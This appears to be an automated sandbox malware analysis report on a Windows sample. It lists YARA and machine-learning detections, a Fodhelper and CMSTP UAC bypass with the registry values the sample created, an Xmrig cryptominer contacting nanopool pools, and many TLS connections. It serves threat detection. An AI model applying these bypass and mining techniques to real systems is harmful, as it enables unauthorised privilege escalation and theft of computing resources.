Windows Analysis Report
MCYq2AqNU0.exe

Machine Learning detection for dropped file

Source: Yara match	File source: 21.2.288c47bbc1871b439df19ff4df68f076.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.288c47bbc1871b439df19ff4df68f076.exe.2e70e67.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.288c47bbc1871b439df19ff4df68f076.exe.3760000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000003.2546245866.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2690691611.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2682406576.0000000000843000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY

Source: C:\ProgramData\Drivers\csrss.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: MCYq2AqNU0.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1BDD20 CryptReleaseContext,	11_2_6D1BDD20
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1BDE00 CryptGenRandom,__CxxThrowException@8,	11_2_6D1BDE00
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1BDEE0 CryptReleaseContext,	11_2_6D1BDEE0
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1BD9D0 CryptAcquireContextA,GetLastError,	11_2_6D1BD9D0
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1BDBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,	11_2_6D1BDBB0
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1E35E0 CryptReleaseContext,	11_2_6D1E35E0
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1BD7D4 CryptReleaseContext,	11_2_6D1BD7D4
Source: C:\Users\user\AppData\Local\Temp\8BAD.exe	Code function: 11_2_6D1BD7F0 CryptReleaseContext,	11_2_6D1BD7F0

Source: 81F7.exe, 0000000A.00000003.4296128737.00000000033EC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

memstr_8493876e-f

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 13.2.9E0E.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.9E0E.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.2510134874.0000000000413000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2478981380.0000000000413000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORY

Privilege Escalation

UAC bypass detected (Fodhelper)

Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Registry value created: DelegateExecute
Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Registry value created: NULL "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: 21.2.288c47bbc1871b439df19ff4df68f076.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.288c47bbc1871b439df19ff4df68f076.exe.2e70e67.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.288c47bbc1871b439df19ff4df68f076.exe.3760000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000003.2546245866.0000000003BA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2690691611.00000000032B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2682406576.0000000000843000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

DNS related to crypt mining pools

Source: unknown	DNS query: name: xmr-eu1.nanopool.org
Source: unknown	DNS query: name: xmr-eu2.nanopool.org

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe	Unpacked PE file: 21.2.288c47bbc1871b439df19ff4df68f076.exe.400000.2.unpack
Source: C:\Users\user\AppData\Local\Temp\nsrD9BD.tmp	Unpacked PE file: 32.2.nsrD9BD.tmp.400000.0.unpack

Source: MCYq2AqNU0.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\MCYq2AqNU0.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Snort IDS alert for network traffic

Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 130.225.244.90:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.33.54:443 -> 192.168.2.6:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.94.2:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.252.102.119:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.58.81.140:443 -> 192.168.2.6:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.23.244.244:443 -> 192.168.2.6:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.211.136.23:443 -> 192.168.2.6:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 195.177.252.5:443 -> 192.168.2.6:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.145:443 -> 192.168.2.6:50937 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:50942 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:50947 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:51344 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:50970 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.160.0.208:443 -> 192.168.2.6:50971 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:51791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:51375 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.152:443 -> 192.168.2.6:51874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.230.63.186:443 -> 192.168.2.6:51794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.224.182.253:443 -> 192.168.2.6:51901 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:51748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.224.182.253:443 -> 192.168.2.6:51871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:52010 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.145:443 -> 192.168.2.6:51947 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.152:443 -> 192.168.2.6:51882 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.224.182.253:443 -> 192.168.2.6:52009 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:51900 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 62.210.211.126:443 -> 192.168.2.6:51848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.230.63.186:443 -> 192.168.2.6:51827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:51803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:50982 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:51754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:50932 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.75.101.58:443 -> 192.168.2.6:51742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:52008 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.236.62.147:443 -> 192.168.2.6:51764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.40.92.90:443 -> 192.168.2.6:51738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.107.32.28:443 -> 192.168.2.6:51943 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 213.186.33.4:443 -> 192.168.2.6:51898 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:51918 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.224.182.253:443 -> 192.168.2.6:52014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.107.56.198:443 -> 192.168.2.6:51884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:52268 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:52255 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 208.109.43.169:443 -> 192.168.2.6:51824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.230.63.107:443 -> 192.168.2.6:51944 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 178.33.253.225:443 -> 192.168.2.6:52244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.107.56.198:443 -> 192.168.2.6:51899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.47.2.70:443 -> 192.168.2.6:52246 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.216.197:443 -> 192.168.2.6:51946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.214.145.11:443 -> 192.168.2.6:52251 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:52253 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:51917 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 59.106.13.100:443 -> 192.168.2.6:51818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.215.240.240:443 -> 192.168.2.6:51868 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 109.71.40.107:443 -> 192.168.2.6:51938 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:51885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 223.29.45.22:443 -> 192.168.2.6:52186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 221.121.158.21:443 -> 192.168.2.6:52341 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.161.71.77:443 -> 192.168.2.6:51865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 218.213.216.154:443 -> 192.168.2.6:52200 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:55922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:56026 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:55919 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:55932 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.232.116:443 -> 192.168.2.6:56229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:56162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:56129 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.12:443 -> 192.168.2.6:56120 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:56705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:56706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:56704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:56824 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.6:56881 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:56942 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:56770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:56777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:56995 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:57032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:57036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:57184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:56778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:57018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.193.11.2:443 -> 192.168.2.6:57033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 208.109.43.169:443 -> 192.168.2.6:57199 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:57161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 178.33.253.225:443 -> 192.168.2.6:57284 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 62.210.211.126:443 -> 192.168.2.6:57332 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:57673 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:57200 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.161.71.77:443 -> 192.168.2.6:57073 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:57706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:57207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:57741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:57796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:58020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:58062 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:58045 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:57792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:57813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:57812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:57846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:57692 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:58341 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:58260 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:58326 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.214.145.11:443 -> 192.168.2.6:58327 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:58413 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.45:443 -> 192.168.2.6:58469 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.10.133.119:443 -> 192.168.2.6:58708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:58993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:59443 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:59642 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:59582 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:59781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:59645 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:59700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:59921 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:60014 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:60234 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:59897 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:60434 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:60539 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:59940 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:59869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:60840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:60729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:60892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:60891 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 62.210.211.126:443 -> 192.168.2.6:60799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 208.109.43.169:443 -> 192.168.2.6:60905 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:60924 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:60941 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:61335 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:61563 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.6:61610 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:61477 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:61402 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:61602 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:62063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.6:62180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 178.33.253.225:443 -> 192.168.2.6:61872 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:61874 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:61879 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:62340 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:62345 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:62410 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:62408 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:62183 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:62488 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:62498 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:62512 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.161.71.77:443 -> 192.168.2.6:62330 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:62624 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:62862 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:62351 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:63031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:62467 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:62813 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.12:443 -> 192.168.2.6:62870 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:63111 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.214.145.11:443 -> 192.168.2.6:62939 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:63051 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.6:63325 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:63341 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:63187 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:63194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 223.29.45.10:443 -> 192.168.2.6:62679 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:63653 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 208.109.43.169:443 -> 192.168.2.6:63750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:63858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 62.210.211.126:443 -> 192.168.2.6:63987 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:64264 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:64273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:64068 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:64044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:64125 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:64367 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.147.96.4:443 -> 192.168.2.6:64268 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:64587 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.45:443 -> 192.168.2.6:64319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:64352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.232.255.130:443 -> 192.168.2.6:64181 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:64507 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:64402 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:64771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:64750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 31.193.11.2:443 -> 192.168.2.6:64663 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.70.75:443 -> 192.168.2.6:64745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.54.169:443 -> 192.168.2.6:64890 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:64946 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:64746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 15.197.204.56:443 -> 192.168.2.6:64988 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:64972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:65189 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:65018 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 223.29.45.10:443 -> 192.168.2.6:64844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:65326 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:65302 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 86.105.245.69:443 -> 192.168.2.6:65196 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.214.145.11:443 -> 192.168.2.6:65296 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.235.125:443 -> 192.168.2.6:65286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 178.33.253.225:443 -> 192.168.2.6:65226 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 46.4.13.92:443 -> 192.168.2.6:65442 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 81.169.145.86:443 -> 192.168.2.6:65343 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 51.159.190.167:443 -> 192.168.2.6:65445 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.39.146.199:443 -> 192.168.2.6:65216 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:49341 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.185.159.144:443 -> 192.168.2.6:49342 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 85.13.138.112:443 -> 192.168.2.6:49215 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.70.42.12:443 -> 192.168.2.6:65484 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 144.91.85.110:443 -> 192.168.2.6:49273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 198.27.92.7:443 -> 192.168.2.6:49390 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.234.52.18:443 -> 192.168.2.6:49386 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.26.61.200:443 -> 192.168.2.6:49373 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:49489 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 3.33.130.190:443 -> 192.168.2.6:49546 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.87.45:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 62.210.211.126:443 -> 192.168.2.6:49615 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.243.5:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.248.169.48:443 -> 192.168.2.6:50056 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 208.109.43.169:443 -> 192.168.2.6:49751 version: TLS 1.2
